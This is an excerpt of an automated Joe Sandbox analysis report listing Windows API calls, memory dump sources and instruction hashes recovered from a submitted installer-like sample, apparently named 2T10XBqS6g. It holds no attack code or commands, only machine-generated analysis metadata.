                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                                                                                                                    • Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                                                                                                                                                                                    • Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                                                                                                                    • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                                                                                                                                                                    • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Create
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                                                                                    • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                                                                                                                    • Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040DAE4,0040CEF0,0040357E,0040CEF0,0040DAE4,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                                                                    • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                                                                    • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(7025505C,?,?,7025504C), ref: 70252A9D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                    • Opcode ID: 6b4ca76c01b68f0fd39cb3a9ae25ef8148810138e6769ddeb3a692fa3b9d38e8
                                                                                                                                                                                                                                    • Instruction ID: 9a66e22ea4f208bf845ce17a3c1142239fe6d6a19936bff466de44c738a1e9b0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b4ca76c01b68f0fd39cb3a9ae25ef8148810138e6769ddeb3a692fa3b9d38e8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF0A5B35053A0DEC350CF2A8C6870A3BE0B70D318B3445EAF188D62E0E3745848EB9D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1096422788-0
                                                                                                                                                                                                                                    • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                                                                                                    • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                                    • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                                                                                    • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                                                                                                                                                                      • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                                                                                                                                                                                      • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                                                                                                                      • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,?), ref: 00406B32
                                                                                                                                                                                                                                      • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                                                                                                                                                                                                      • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2972824698-0
                                                                                                                                                                                                                                    • Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                                                                                                                                                                                    • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(?,?,702512DB,?,7025137F,00000019,702511CA,-000000A0), ref: 702512C5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                                                    • Opcode ID: b372ff1324b7f07d077ce650ab2fbfac3ae46393402ad86535da122ca12b040c
                                                                                                                                                                                                                                    • Instruction ID: f9868db5e188b449514c26305e2489c055e05e146dfb1f170ecd468047285785
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b372ff1324b7f07d077ce650ab2fbfac3ae46393402ad86535da122ca12b040c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EB012736000109FEE008B15DC0EF353294F700304F740080B704C10D0D1605800952C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004058F0
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 00405993
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                                                                                                                                                                                                      • Part of subcall function 00404636: SendMessageW.USER32(?,?,?,00404461), ref: 00404644
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405A1B
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405A3F
                                                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 00405A44
                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00405A8E
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405AD3
                                                                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405B07
                                                                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405B20
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405B68
                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405B6E
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
